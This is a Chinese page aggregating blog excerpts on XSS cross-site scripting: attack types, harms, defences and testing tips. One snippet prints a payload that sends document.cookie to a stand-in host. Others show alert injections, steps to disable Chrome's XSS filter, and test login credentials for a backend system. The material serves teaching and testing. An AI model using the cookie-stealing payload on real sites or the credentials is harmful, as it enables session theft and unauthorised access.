精华内容
下载资源
问答
  • XSS跨站攻击

    2012-06-22 00:03:12
    XSS跨站攻击 目录 1 XSS跨站攻击简介 1 1.1 什么是XSS 1 1.2 XSS的分类 1 1.3 XSS的危害 1 2 XSS的攻击原理 1 2.1 本地式漏洞攻击 1 2.2 存储式漏洞攻击 2 2.3 反射式漏洞攻击 2 3 XSS的防御策略 3 ...
    XSS跨站攻击
    


    目录
    1 XSS跨站攻击简介 1
    1.1 什么是XSS 1
    1.2 XSS的分类 1
    1.3 XSS的危害 1
    2 XSS的攻击原理 1
    2.1 本地式漏洞攻击 1
    2.2 存储式漏洞攻击 2
    2.3 反射式漏洞攻击 2
    3 XSS的防御策略 3
    3.1 过滤特殊字符或敏感字段 3
    3.2 对敏感数据进行加密 4



    1 XSS跨站攻击简介
    1.1 什么是XSS
    XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。

    1.2 XSS的分类
    一类是来自内部的攻击,主要指的是利用网页自身的漏洞,将恶意脚本注入到网页,当用户访问此页面时,恶意脚本也会跟着执行,这样恶意脚本就能利用到用户的所有状态数据执行恶意操作,比如发微博、私信等(新浪微博的XSS攻击就是此类)。
    另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,攻击网站漏洞。

    1.3 XSS的危害
    • 盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
    • 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
    • 盗取企业重要的具有商业价值的资料
    • 非法转账电子邮件
    • 强制发送网站挂马
    • 控制受害者机器向其它网站发起攻击

    2 XSS的攻击原理
    XSS攻击原理是利用web应用的漏洞进行攻击的。这些漏洞攻击可归类为三种:本地式漏洞攻击,存储式漏洞攻击,反射式漏洞攻击。

    2.1 本地式漏洞攻击
    这种漏洞存在于页面中客户端脚本自身。
    攻击工程:
    A(攻击者)给B(被攻击者)发送一个恶意构造了Web的URL。
    B点击并查看了这个URL。
    恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
    具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
    A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。

    2.2 存储式漏洞攻击
    该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
    攻击过程:
    C拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
    A注意到C的站点具有存储式漏洞。
    A发布一个热点信息,吸引其它用户纷纷阅读,该热点信息中潜藏着一段XSS攻击代码。
    C或者是任何的其他人B浏览该信息,其会话cookies或者其它信息将被A盗走或攻击。

    2.3 反射式漏洞攻击
    类似存储式漏洞,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能注入到动态页面中。
    攻击过程:
    B经常浏览某个网站C。B使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)在网站A中。
    A发现C站点包含反射性的XSS漏洞,编写一利用漏洞的URL,并将其冒充为来自C的邮件给B。
    B在登录到C的站点后,浏览A供的URL。
    嵌入到URL中的恶意脚本在B的浏览器中执行,然后在B完全不知情的情况下将这些信息发送到A的Web站点。

    3 XSS的防御策略

    3.1 过滤特殊字符或敏感字段
    XSS攻击也是利用了Web页面的编写疏忽,所以有一种方法就是从Web应用开发的角度来避免。
    (1) 对输入数据进行验证与过滤:
    用户在界面输入数据时,可以通过js对提交数据进行验证和过滤,但这层验证防御很弱,很容易让攻击者攻破。除了在界面前端验证过滤外,我们还可以通过后台对页面提交过滤的数据进行验证和过滤。严格的验证可以让web应用将可攻击漏洞降到最小,同时也可以保证信息的安全性和系统正确性。
    如:可以对用户输入<script>,<img>,<iframe>,http,src等敏感信息进行过滤。可以对数据格式进行验证,比如邮箱输入,必须满足一定的邮箱格式。
    (2) 对输出数据进行过滤:
    Web应用在将数据展现给用户的时候,特别是那些由用户输入的数据在输出时必须进行过滤后在展现给用户界面。
    如:在jsp页面动态展现后台数据输出信息是,可以使用:
    <c:out value=”${xxx}”/>
    输出数据信息,这样out标签会对数据进行相应的过滤处理,即使数据中包含有攻击性脚本代码,也会过滤为文本的形式展现出来。

    3.2 对敏感数据进行加密
    这里所说的敏感数据,就是关系到系统安全的数据,系统中重中之重的数据。
    Web应用中往往最敏感的数据信息就是用户信息(用户名,密码),对这些敏感信息的使用和存储都要谨慎小心,因为web应用系统的根本就是用户,一旦用户信息被攻击,可以想象整个web系统会遭受怎样的攻击和破坏。
    (1) web系统中对敏感数据加密存储:
    在web系统中对敏感数据的常用存储就三种:一种是后台存储,如数据库存储。一种是前端存储,如cookie存储。一种内存存储,如session。不管是那种存储都必须对安全数据进行加密存储。
    如数据库存储用户密码必须使用加密存储,最好是使用不可破解不可逆的算法加密,如md5(当然MD5也可以通过穷举法来破解,我们可以在md5基础上加上特别的算法来加密);
    如cookie存储,如果用cookie来存储敏感信息,最好是不要存储实质性的敏感信息,而存储一个加密的token信息,根据前端页面传过来的token信息在后台代码中匹配验证或获取相对应的信息。

    参见:cookie使用安全 http://xmong.iteye.com/blog/1566102

    如session存储,对于这种内存中存储的信息,要遵循,作用域最小化,能清则清。用户信息如果能在request中使用的,就最好不要再session中使用。一是信息常驻内存,二存储作用域扩大不够安全。session中存储用户信息最好不要连带用户特敏感信息,如用户密码,能清则清。
    (2) web系统中要安全使用敏感数据:
    web系统中要安全使用敏感数据,对这些数据的使用访问要有相应的权限控制和验证,同时通信的过程中也要注意通信安全,如加密,采用SSL通道等


    ***************************

    未完待续
    展开全文
  • xss跨站攻击

    2015-09-25 17:27:43
    对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 数据来源:2007 OWASP Top 10的MITRE数据 注:OWASP是世界上最知名的Web安全与数据库安全研究组织 ...
  • XSS跨站攻击课程.pdf

    2021-01-25 18:15:43
    XSS跨站攻击课程
  • PHP和XSS跨站攻击的防范
  • 主要介绍了Laravel5中防止XSS跨站攻击的方法,结合实例形式分析了Laravel5基于Purifier扩展包集成HTMLPurifier防止XSS跨站攻击的相关操作技巧,需要的朋友可以参考下
  • 主要介绍了ThinkPHP2.x防范XSS跨站攻击的方法,实例分析了ThinkPHP2.x针对XSS跨站攻击的防范技巧,具有一定参考借鉴价值,需要的朋友可以参考下
  • PHP和XSS跨站攻击.pdf

    2021-09-13 10:29:15
    PHP和XSS跨站攻击.pdf
  • 修复swfupload2.5版存在的XSS跨站攻击漏洞,测试无错误版本。
  • 模拟XSS跨站攻击

    千次阅读 2019-04-03 09:45:35
    模拟XSS跨站攻击 假设场景: 在入库和出库时均不作处理时 会被利用触发 2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>XSS跨站攻击</title>...

    模拟XSS跨站攻击

    假设场景:
    在入库和出库时均不作处理时 会被利用触发
    2.php

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>XSS跨站攻击</title>
    </head>
    <body>
    <form>
        <input type="text" name="foo" value='<?php echo $_GET['foo']; ?>'>
        <input type="submit" width="200px"></input>
    </form>
    </body>
    </html>
    
    // 输入
    '><script type='text/javascript'>alert('XSS攻击');</script><a b='
    

    在这里插入图片描述
    结果:
    可能会攻击失败,执行失败是因为浏览器开启了自己的xss filter,测试需要关闭
    在这里插入图片描述
    如何关闭?(其它浏览器关闭方法自行百度)
    在使用浏览器进行xss测试时需要预先关闭xss过滤器
    chrome的关闭方法:
    我的chrome安装目录在C:\Program Files (x86)\Google\Chrome\Application\chrome.exe,关闭方法是在命令行输入以下命令:
    “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --args --disable-xss-auditor
    我的做法是复制上面一行,在桌面新建一个快捷方式,然后把上面一行的代码黏贴到“目标对象”,此处需要注意的是双引号以及双引号内的内容应该为你本身机子内的chrome的安装地址。这样就会在桌面新建一个你关掉了xss过滤器后的新的chrome的快捷方式。
    完成后需重启才能生效。
    在这里插入图片描述
    IE
    在这里插入图片描述
    当然,这样的破坏并不会造成实质性的影响。但是,假如这里不是执行一个popup操作,
    而是

    '><script type='text/javascript'>document.location=?'http://zev.com/cgi-bin/cookie.cgi?f='+document.cookie</script><a b='
    

    当一个用户被引导去点击带有这段JavaScript代码的URL的时候,其cookie数据将会被发送到zev.com.
    当然用户也可能不会去点击带有evil.com字符的URL,但是一些人会特意地把"evil.com"进行URL编码,以便这个URL看起来不是那么引人注目。

    还有 依靠浏览器的xss filter不可行,因为可以被用户关闭。

    展开全文
  • 教你如何快速发现XSS跨站攻击漏洞 什么是XSS跨站攻击? 跨脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨脚本攻击缩写为XSS。恶意攻击者往Web页面里插入...

    教你如何快速发现XSS跨站攻击漏洞
    什么是XSS跨站攻击?
    跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。(以上内容来自百度百科)
    其实简单理解,就是我们的程序,在参数传入时,没有对输入字符串中特殊字符或字符串做合理的检查和处理,如果参数传入的内容中,包含了恶意代码,那么我们的程序就会把这段恶意代码在浏览器中执行。那么,XSS跨站攻击会给我们带来哪些危害呢?下面的这些内容,或许你并不陌生:
    1、钓鱼欺骗
    2、网站挂马
    3、身份盗用
    4、盗取网站用户信息
    5、垃圾信息发送
    6、劫持用户Web行为
    7、XSS蠕虫
    在哪些地方需要进行XSS跨站攻击的测试验证?
    可传参的URL中
    可输入内容的表单
    怎么快速判断是否有XSS跨站攻击注入点?
    即在表单填写框中直接注入攻击脚本(一般都是JS脚本),如在表单中输入JS内容后,正常预期程序是不应该让脚本执行的,如果程序没有对输入内容做有效处理,则提交后程序会执行我们输入的JS代码。
    XSS跨站攻击测试示例
    下面测试步骤举例以可视化当前暂未被修复的一个XSS跨站攻击点为例,帮助大家理解如何发现XSS跨站攻击点。
    1、登陆可视化运营后台:
    athena-mf.maoniuchuxing.com 13000000000 111111
    (以上账号仅适用于测试服和预发布)
    2、进入【可视化运营后台-用车订单-行程变更审核】模块,选择一个审核状态为“待审核”的订单,在审核建议中输入以下内容:
    点击【提交】(当前因该模块有部分需求变动,还未提测,第一次点击提交审核时可能会报错,再次点击会提醒审核状态已变化,如果遇到,请先忽略这个问题)
    在这里插入图片描述
    3、提交成功后,页面自动刷新,在加载刷新步骤2提交审核的订单当前页码时,浏览器上会弹出一个嵌入式页面的对话框,并显示内容”Hello,XSS“
    在这里插入图片描述

    以上,如果该字段的输入内容被做了有效的验证和处理,如语句中特有的<>等特殊符号被处理掉,那么程序就不会执行这段JS代码。提交后查看审核建议时,页面也不会有任何异常的提示信息。
    还有在URL中进行XSS注入,也就是把URL中的参数改成JS脚本。使用网上的一个举例给大家做为参考:
    如“http://www.cnblogs.com/javame/index.asp?IDClass=2&ClassName=abc”
    改成“http://www.cnblogs.com/javame/index.asp?IDClass=2&ClassName=abc”
    看看有没弹出对话框显示hello,有的话就有跨站漏洞。
    上面举例,是以页面加载弹出框的方式发现是否存在XSS跨站攻击,并不等同于所有的攻击代码,都会有弹窗提醒,代码是可以实现用户不感知的方式来注入攻击脚本的。因此,测试人员应该在测试过程中,尽可能的去主动发现这些安全漏洞。

    展开全文
  • XSS跨站攻击,注入代码整理,大全

    热门讨论 2012-03-03 15:25:08
    XSS跨站攻击,注入代码整理,希望大家支持
  • web安全性测试——XSS跨站攻击

    千次阅读 2018-05-29 21:06:33
    一、什么是xss跨站攻击脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之...

    一、什么是xss跨站攻击
    跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
    二、如何写xss脚本
    这里写图片描述
    在被测网页输入html语句,观察操作结果是否存在安全隐患。
    三、获取用户cookie
    1、获取cookie
    这里写图片描述
    2、传输用户cookie到本地
    这里写图片描述
    这里写图片描述
    或者用其他方法获得用户cookie:
    这里写图片描述

    展开全文
  • xss跨站攻击 cookie设置

    千次阅读 2015-11-16 18:14:27
    关于cookie的问题,很多时候遇到的是信息泄露,为什么会有信息泄露,首先要了解什么是xss跨站脚本攻击xss跨站攻击简单来说就是插入恶意代码,或者劫持用户cookie,从而达到操纵系统的目的。 因此在浏览器上设置...
  • xss 跨站攻击代码

    2011-12-09 18:07:15
    跨站攻击过滤代码
  • 如何进行渗透测试XSS跨站攻击检测

    千次阅读 2019-10-08 09:17:45
    国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲这个XSS是如何实现...
  • BFG 2015 I 第 021-1 号 开发代码安全规范 防 SQL 注入和 XSS 跨站攻击代码编写规范 修订历史 版本 发布日期 作者 审核者 改版记录 1.0 2015-12-01 正式版 目 录 概述 2 适用范围 3 一第一类漏洞类型 - SQL注入 SQL ...
  • XSS跨站攻击详解

    千次阅读 2016-05-28 17:06:17
    XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取...
  • Word 资料 BFG 2015 I第021-1号 开发代码安全规范 防SQL注入和XSS跨站攻击代码编写规范 修订历史 版本 发布日期 作者 审核者 改版记录 1.0 2015-12-01 正式版 目 录 TOC \o "1-3" \h \z \u 概述 2 适用范围 3 一第...
  • 资料内容仅供您学习参考如有不"|之处请联系改正或者删除 ...开发代码安全规范 防SQL注入和XSS跨站攻击代码编写规范 修订历史 版本 发布日期 作者 审核者 改版记录 1.0 -12-01 正式版 目录 概述 错误!未定义书签 适用范

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 32,734
精华内容 13,093
关键字:

xss跨站攻击